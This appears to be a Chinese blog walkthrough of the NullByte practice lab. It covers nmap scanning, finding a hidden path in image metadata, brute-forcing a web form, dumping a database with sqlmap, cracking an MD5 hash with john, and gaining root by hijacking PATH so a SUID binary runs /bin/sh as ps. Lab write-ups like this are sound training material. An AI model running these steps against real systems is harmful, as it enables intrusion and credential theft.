【学渗透靶机——NullByte(suid 提权)】

信息收集

主机信息收集

主机ip地址

nmap -sn  192.168.241.0/24  

在这里插入图片描述

主机开放端口信息

nmap --min-rate 10000 -p- 192.168.241.161

在这里插入图片描述

主机开放端口详细信息

nmap -sT -sV -p80,111,777,53062 192.168.241.161

在这里插入图片描述

nmap 脚本探测主机漏洞信息

nmap --script=vuln  -p80,111,777,53062 192.168.241.161 

在这里插入图片描述
主机开放了80(http),111,777(ssh),53062(未知) , SSH 目前没有收集到账号及密码信息,爆破ssh 暂时放弃,那重点放在80 端口上,

web信息收集

80端口

80 是http服务,先打开看看
在这里插入图片描述
查看源代码也没有用信息
在这里插入图片描述

下载图片文件分析

(1) 查看文件类型

file main.gif

在这里插入图片描述
(2)查看图片信息是否有捆绑

binwalk main.gif 

在这里插入图片描述
(3)查看图片是否隐写信息

exiftool main.gif

在这里插入图片描述
发现有字符串:kzMb5nVYJw 这个有可能是SSH ROOT密码,也有可能是路径,
尝试登录失败
接下来尝试路径
在这里插入图片描述
果然是路径,, 但是这个需要输入key ,我们目前没有密码
查看源代码
在这里插入图片描述

暴力破解表单

说这个表单不能连接数据库,并且密码不复杂
那我们爆破尝试一下,打开burp 抓包进行爆破,使用rockyou.txt 这个密码字典,爆破出来密码为elite
在这里插入图片描述
输入密码后,输入admin
在这里插入图片描述
在这里插入图片描述

sql注入

从上面的url 判断可能存在sql注入,sqlmap 尝试一下

sqlmap -u "http://192.168.241.161/kzMb5nVYJw/420search.php?usrtosearch=admin"  --dump --batch 

在这里插入图片描述

john 破解MD5 hash

表中的字符串可能是base64 尝试解密

echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |base64 -d

在这里插入图片描述

c6d6bd7ebf806f43c76acc3681703b81

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

在这里插入图片描述

提权

获取系统初始立足点

密码破解出拉omega。使用密码对应账号ramses尝试SSH登录。登录成功 nmap 端口扫描时SSH的端口是777

在这里插入图片描述

查看当前用户以root权限能够执行命令

在这里插入图片描述
发现没有

查看计划任务

**在这里插入图片描述**

当前用户组可以操作哪些权限


查看文件.bash_history看看能不能发现当前账号执行过什么命令
在这里插入图片描述
这个是什么东西呢,,既然不认识,那就执行这个命令看看

在这里插入图片描述
procwatch 执行时调用了sh 和ps
知道上面的结果那么我们可以劫持ps命令提权了

提权操作

cd /var/www/backup
ln -s /bin/sh ps
export PATH=.:$PATH
./procwatch

在这里插入图片描述

也可以生成一个ps文件,然后里面写/bin/sh就可以,给这个文件所有权限然后执行二进制即可提权

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值